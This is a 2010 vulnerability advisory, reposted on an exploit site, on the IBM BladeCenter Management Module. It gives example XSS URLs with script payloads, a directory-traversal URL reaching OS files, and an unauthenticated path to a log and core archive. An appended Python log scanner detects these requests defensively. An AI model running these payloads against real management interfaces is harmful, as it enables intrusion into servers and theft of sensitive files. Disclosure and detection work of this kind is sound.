
IBM Bladecenter Management - Multiple vulnerabilities

Posted on 06 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IBM Bladecenter Management - Multiple vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head>
<body><pre>
=====================================================
IBM Bladecenter Management - Multiple vulnerabilities
=====================================================

Application: IBM BladeCenter Management Module
Versions Affected: BPET48L and possibly other versions
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: XSS, Directory traversal, Information disclosure
Exploits: YES
Reported: 05.09.2009
Vendor response: 09.09.2009
Solution: YES
Date of Public Advisory: 05.07.2010
Author: Sintsov Alexey from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)


Description
***********

The BladeCenter management module is prone to multiple security vulnerabilities:

1 Dynamic XSS
2 Directory Listing
3 Unauthorized Access


Details
*******

1. Multiple XSS vulnerabilities found in the BladeCenter web management interface

Examples
*******

http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert('XSS1');%3C/script%3E&amp;VLANID=&amp;IPADDR=3&gt;%3Cscript%3Ealert('XSS2');%3C/script%3E
http://[BLADECENTER]/private/power_management_policy_options.php?domain=3&lt;XSS&gt;
http://[BLADECENTER]/private/pm_temp.php?view=6&amp;mod_type=3&amp;slot=3&lt;XSS&gt;
http://[BLADECENTER]/private/power_module.php?view=4&amp;mod_type=4&amp;slot=3&lt;XSS&gt;
http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3&lt;XSS&gt;
http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3&lt;XSS&gt;&amp;save=1


2. Directory Listing vulnerability found in the BladeCenter web management interface

The attacker needs to be authorized.

Examples
*******

http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc

An attacker can get full access to OS files.


3. Unauthorized access

Sensitive data (system logs, cores) can be accessed by requesting a file:

Examples
*******

http://[BLADECENTER]/private/sdc.tgz


Solution
********

All three issues were fixed in v4.7 and v5.0.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-06]
</pre></body></html>
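
A detection check for the three issues above, added here as an example (it is not part of the DSecRG advisory or of any IBM tooling): it reviews web access logs for requests under /private/ that carry markup in a parameter, a `..` segment in `DIR`, or a successful download of `sdc.tgz` with no authenticated user. The combined-log-format input from a fronting proxy, the sample lines and the names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample (combined log format, as a reverse proxy in front of the
# management module might write it); addresses and users are made up.
SAMPLE_LOG = """\
10.0.0.5 - admin [06/Jul/2010:10:00:01 +0000] "GET /private/blade_leds.php?WEBINDEX=3 HTTP/1.1" 200 512
10.0.0.9 - admin [06/Jul/2010:10:00:07 +0000] "GET /private/blade_leds.php?WEBINDEX=3%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 530
10.0.0.9 - admin [06/Jul/2010:10:00:09 +0000] "GET /private/file_management.php?DIR=/../../../tmp/etc HTTP/1.1" 200 2048
10.0.0.7 - - [06/Jul/2010:10:00:15 +0000] "GET /private/sdc.tgz HTTP/1.1" 200 91234
10.0.0.5 - admin [06/Jul/2010:10:00:20 +0000] "GET /private/file_management.php?DIR=/tmp HTTP/1.1" 200 900
"""

# Captures: client, remote user, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')
# Markup characters; assumed never legitimate in these parameters' values.
MARKUP_RE = re.compile(r'[<>"\']')

def classify(line):
    """Return (client, finding) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, user, _method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)
    if not path.startswith("/private/"):
        return None
    # Assumes the proxy records the authenticated user; "-" means none.
    if path.endswith("/sdc.tgz") and user == "-" and status == "200":
        return client, "unauthenticated-sdc-download"
    # parse_qsl decodes once; the extra unquote catches double encoding.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = unquote(value)
        if name.upper() == "DIR" and ".." in re.split(r"[\\/]", decoded):
            return client, "dir-traversal"
        if MARKUP_RE.search(decoded):
            return client, "markup-in-parameter"
    return None

def scan(log_text):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

On firmware that still has these issues, the same patterns can be used as deny rules on the proxy while the update to a fixed version is scheduled.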

 
